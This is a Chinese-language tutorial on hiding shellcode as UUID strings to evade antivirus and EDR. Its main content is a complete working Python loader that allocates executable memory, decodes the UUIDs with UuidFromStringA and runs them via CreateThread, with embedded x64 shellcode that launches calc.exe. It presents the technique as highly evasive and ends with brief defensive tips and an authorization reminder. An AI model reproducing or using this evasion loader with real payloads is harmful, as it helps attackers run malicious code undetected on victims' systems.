首先了解一下 UUID: UUID(通用唯一標識符)是一種 128 位的值,常用於軟體系統中,用以提供幾乎可以保證唯一性的引用。它通常以字符串形式表示,由十六進制數字組成,並被劃分為五個部分。由於其結構和生成方式(基於時間戳或隨機數),UUID 發生衝突的可能性極低,因此非常適合在分佈式系統中用於標識對象或記錄,尤其是在缺乏中心化唯一性管理機制的場景下。
惡意腳本,主要利用了微軟提供的一個 API 函數(), 該函數可以將 UUID 字符串轉換為二進制格式。因此,上面的一堆 UUID, 一旦解碼為原始字節,就會以 shellcode 的身份注入到內存中執行。利用這種技術的惡意軟體逃避追殺的概率極高,VT 評分僅為:2/61。
基於 UUID 的 Shellcode 加載器(Python 實現)
這段代碼模擬了攻擊者如何將 Shellcode 編碼為 UUID 格式,並在內存中加載執行。實際攻擊中,此類代碼可能用於繞過 AV/EDR 檢測。
假設我們有一段簡單的 Shellcode(如彈計算器 calc.exe 的 x64 Shellcode),可以將其分割為 16 字節的塊,並轉換為 UUID 格式:
import ctypes
import uuid
def generate_uuid_shellcode(shellcode):
"""將Shellcode轉換為UUID格式的字符串列表"""
uuid_shellcode = []
for i in range(0, len(shellcode), 16):
chunk = shellcode[i:i+16]
# 不足16字節用NOP (0x90) 填充
if len(chunk) < 16:
chunk += b"\x90" * (16 - len(chunk))
uuid_str = str(uuid.UUID(bytes_le=chunk))
uuid_shellcode.append(uuid_str)
return uuid_shellcode
def execute_uuid_shellcode(uuid_shellcode):
"""在內存中加載並執行UUID格式的Shellcode"""
# 分配可讀、可寫、可執行的內存 (RWX)
rwx_page = ctypes.windll.kernel32.VirtualAlloc(
ctypes.c_int(0),
ctypes.c_int(len(uuid_shellcode) * 16),
ctypes.c_int(0x1000), # MEM_COMMIT
ctypes.c_int(0x40) # PAGE_EXECUTE_READWRITE
)
if not rwx_page:
print("[!] VirtualAlloc 失敗!")
return False
# 將UUID字符串轉換回二進制並寫入內存
ptr = rwx_page
for u in uuid_shellcode:
status = ctypes.windll.rpcrt4.UuidFromStringA(
ctypes.c_char_p(u.encode()),
ctypes.c_void_p(ptr)
)
if status != 0:
print(f"[!] UuidFromStringA 失敗 (狀態: {status})")
return False
ptr += 16
# 創建線程執行Shellcode
thread_handle = ctypes.windll.kernel32.CreateThread(
ctypes.c_int(0),
ctypes.c_int(0),
ctypes.c_void_p(rwx_page),
ctypes.c_int(0),
ctypes.c_int(0),
ctypes.pointer(ctypes.c_int(0))
)
if not thread_handle:
print("[!] CreateThread 失敗!")
return False
# 等待線程結束
ctypes.windll.kernel32.WaitForSingleObject(
ctypes.c_int(thread_handle),
ctypes.c_int(-1)
)
return True
if __name__ == "__main__":
# 示例Shellcode (x64彈計算器,需替換為實際研究用途的Shellcode)
shellcode = (
b"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
b"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
b"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
b"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
b"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
b"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
b"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
b"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
b"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
b"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
b"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
b"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
b"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
b"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
b"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f"
b"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff"
b"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
b"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c"
b"\x63\x2e\x65\x78\x65\x00"
)
# 生成UUID格式的Shellcode
print("[+] 生成UUID格式的Shellcode...")
uuid_shellcode = generate_uuid_shellcode(shellcode)
for u in uuid_shellcode:
print(f'"{u}",')
# 執行Shellcode
print("\n[+] 執行Shellcode...")
if execute_uuid_shellcode(uuid_shellcode):
print("[+] Shellcode執行完成!")
else:
print("[!] Shellcode執行失敗!")
關鍵代碼解釋#
generate_uuid_shellcode#
- 將原始 Shellcode 按 16 字節分塊。
- 每塊轉換為 UUID 字符串(小端字節序)。
execute_uuid_shellcode#
- 使用
VirtualAlloc分配 RWX 內存。 - 調用
UuidFromStringA將 UUID 還原為二進制並寫入內存。 - 通過
CreateThread執行內存中的 Shellcode。
Shellcode 替換#
- 示例中的 Shellcode 是 x64 彈計算器的 Payload,實際研究中可替換為其他合法用途的 Shellcode(如漏洞研究中的 PoC)。
防禦建議#
監控以下 API 調用:#
VirtualAlloc+CreateThread組合。UuidFromStringA用於轉換長字符串。
行為檢測:#
- 檢查進程是否頻繁分配 RWX 內存。
- 使用 EDR 工具(如 Elastic Endpoint)捕獲內存注入行為。
測試環境:#
- 僅在隔離的虛擬機(如 VMware + 快照)中運行此類代碼。
請始終遵守滲透測試授權和合規性要求!